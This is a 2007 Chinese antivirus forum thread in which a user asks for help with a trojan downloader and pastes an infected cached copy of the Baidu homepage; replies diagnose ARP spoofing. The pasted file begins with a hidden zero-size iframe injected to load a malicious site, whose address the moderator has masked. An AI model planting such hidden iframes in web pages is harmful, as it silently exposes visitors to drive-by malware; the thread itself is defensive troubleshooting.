微点交流论坛 - 主动防御 - 最新病毒求救！

xulingyun
新手上路

积分 25
发帖 25
注册 2007-4-15

#1 最新病毒求救！

832823.cn  网络应用加速器
除了832823.cn网络加速器过还有一个木马程序
Trojan-Downloader.HTML.Agent.fl病毒一打开网页就出现提示说脚本病毒，都还是杀不了
咔吧杀步了微点也是
一打开网页就下载病毒怎么办啊

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6DEL6NK1\www.baidu[1]

这是它的主要路径冒充baidu妈的
下面是原文“baidu[1].html” 的原文件但是删了就又有了，无法删除啊！！

<iframe src='http://www.***.com' width=0 height=0></iframe>                                              <html><head><title>百度一下，你就知道 </title><meta http-equiv=Content-Type content="text/html;charset=gb2312">
<style>body{margin:4px 0 4px 0;}img{border:0}td,p{font-size:12px}p{width:600px;margin:0;padding:0}.kw{font-family:Verdana;font-size:16px;height:1.78em;padding-top:2px;}
#b {width:600px;height:30px;padding-top:4px;color:#77c;font-size:12px;font-family:Arial}#b a{color:#77c;font-size:12px}
#usrbar{padding-right:10px;line-height:19px;font-size:12px;font-family:Arial;text-align:right;white-space:nowrap;margin-bottom:3px !important;margin-bottom:10px;}
.sb{height:2em;width:5.6em;font-size:14px;}#km{font-size:14px;height:50px;}a{font-family:arial}#km a{font-family:宋体}
#l{font-size:14px;font-family:arial;width:600px;text-align:left;margin-bottom:5px}
#l tr td{text-align:left;font-family:arial;}
#l tr td div{font-size:14px;margin-left:92px;width:22.1em;text-align:center;}</style><script>
function h(obj,url){obj.style.behavior='url(#default#homepage)';obj.setHomePage(url);}
function g(){var ls=location.search;if(ls.indexOf("q=")!=-1){try{var q=(ls.match(new RegExp("q=[^&$]*")).toString());document.f.wd.value=decodeURIComponent(q.substr(2));}catch(e){}}}
function s(o,p){if(document.f.wd.value.length>0){var oh=o.href;var qw=encodeURIComponent(document.f.wd.value);if(oh.indexOf("q=")!=-1){o.href=oh.replace(new RegExp("q=[^&$]*"),"q="+qw);}else{var s=p?"&":"?";o.href=o.href+s+"q="+qw};}}</script></head>
<body text=000000 link=0000cc vlink=0000cc alink=ff6600>
<div id="usrbar"><script language="JavaScript">document.write('<a href="http://passport.baidu.com/?login&tpl=mn&u='+escape(location.href)+'">登录</a>');</script></div>
<center><a href=http://hi.baidu.com/baidu target=_blank><img src=http://www.baidu.com/img/logo.gif width=174 height=59 alt="点此进入百度空间" ></a><br><br><br><br>
<table border="0" cellpadding="0" cellspacing="0" id="l" ><tr><td><div><a href="http://news.baidu.com" onclick="return s(this);">新 闻</a>    <strong>网 页</strong>    <a href="http://post.baidu.com/f?ct=486539264&cm=58580&tn=baiduForumIndex" onclick="return s(this,1);">贴 吧</a>    <a href="http://zhidao.baidu.com" onclick="return s(this);">知 道</a>    <a href="http://mp3.baidu.com" onclick="return s(this);">MP3</a>    <a href="http://image.baidu.com" onclick="return s(this);">图 片</a></div></td></table>
<table width=600 border=0 cellpadding=0 cellspacing=0><tr valign=top><td width=92></td><td height=62> <form name=f action=/s><input type=text name=wd class=kw size=36 maxlength=100><script>document.f.wd.focus();g()</script><input type=hidden name=cl value=3>  <input type=submit value=百度一下 class=sb><br><br></form></td><td width=100><a href=/search/jiqiao.html>帮助</a><br><a href=/gaoji/advanced.html>高级</a></td></tr></table>
<p id=km> <a href="http://hi.baidu.com/">空间</a> | <a href="http://www.baidu.com/more/">更多>></a></p>
<p style=height:60px;> </p>
<p style=height:30px;><a onclick="h(this,'http://www.baidu.com')" href=http://utility.baidu.com/traf/click.php?id=215&url=http://www.baidu.com>把百度设为首页</a></p>
<p style=height:14px;><a href=http://jingjia.baidu.com/>企业推广</a> | <a href=http://top.baidu.com/>搜索风云榜</a> | <a href=/home.html>关于百度</a> | <a href=http://ir.baidu.com>About Baidu</a></p><p id=b>©2007 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读</a> <a href=http://www.miibeian.gov.cn/ target=_blank>京ICP证030173号</a> <a href=http://www.hd315.gov.cn/beian/view.asp?bianhao=010202001092500412><img src=http://gimg.baidu.com/img/gs.gif></a></p></center></body></html>


[ Last edited by Legend on 2007-10-8 at 12:50 ]

附件 1: 1.GIF (2007-10-8 11:44, 24.46 K,下载次数： 46)

※ ※ ※ 本文纯属【xulingyun】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-8 11:44

aidi
中级用户

新手上路

积分 256
发帖 221
注册 2006-3-6

#2

是打开所有网站都这样提示吗？
开网页时注意看下浏览器下面地址栏处是否显示跳转到了其他的域名，或者在当前页面右键察看源代码看是否有<iefram ...语句的内容。
初步怀疑是arp欺骗引起。

※ ※ ※ 本文纯属【aidi】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-8 11:53

xulingyun
新手上路

积分 25
发帖 25
注册 2007-4-15

#3

哦我看看

※ ※ ※ 本文纯属【xulingyun】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-8 11:54

xulingyun
新手上路

积分 25
发帖 25
注册 2007-4-15

#4

微点还是没有杀掉

[url]www.***.com[*/url] 居然连接这个网站晕的！！！

[ Last edited by Legend on 2007-10-8 at 12:51 ]

※ ※ ※ 本文纯属【xulingyun】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-8 12:08

Legend
超级版主

超级版主

积分 77171
发帖 70170
注册 2005-10-29

#5

请勿在论坛里面直接贴出可疑病毒网址链接，为了避免其他网友误点，原可疑链接已做屏蔽处理。下次请直接发到virus@micropoint.com.cn我们会具体测试分析。
楼主的情况根据您提供的信息初步判断为您的网络中存在arp欺骗现象，推荐您使用微点软件安全防护与策略-传统防火墙设置中的mac地址绑定功能，绑定您的真实的网关的mac地址，并请同时联系您的局域网络管理人员，查找欺骗主机进行病毒查杀。

※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※

微点官方认证新浪微博：欢迎进入微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息

2007-10-8 12:55

CBHENIN
新手上路

积分 39
发帖 39
注册 2007-5-1

#6

这个是什么网站？？
居然冒充我可爱的百度。。

※ ※ ※ 本文纯属【CBHENIN】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-8 21:01

backhamchen
注册用户

积分 176
发帖 178
注册 2007-9-26

#7

哦这么凶悍啊卡巴都没办法找到位置试试手动挂它啊

※ ※ ※ 本文纯属【backhamchen】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-8 23:41

zj163168
中级用户

积分 263
发帖 263
注册 2007-1-17

#8

aidi
的见解很对~~

如果在本机杀了无效的话,
极度有可能是ARP病毒,
病毒的根源在另一台电脑,

你是在局域网中上网不?

※ ※ ※ 本文纯属【zj163168】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-10-9 09:17

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号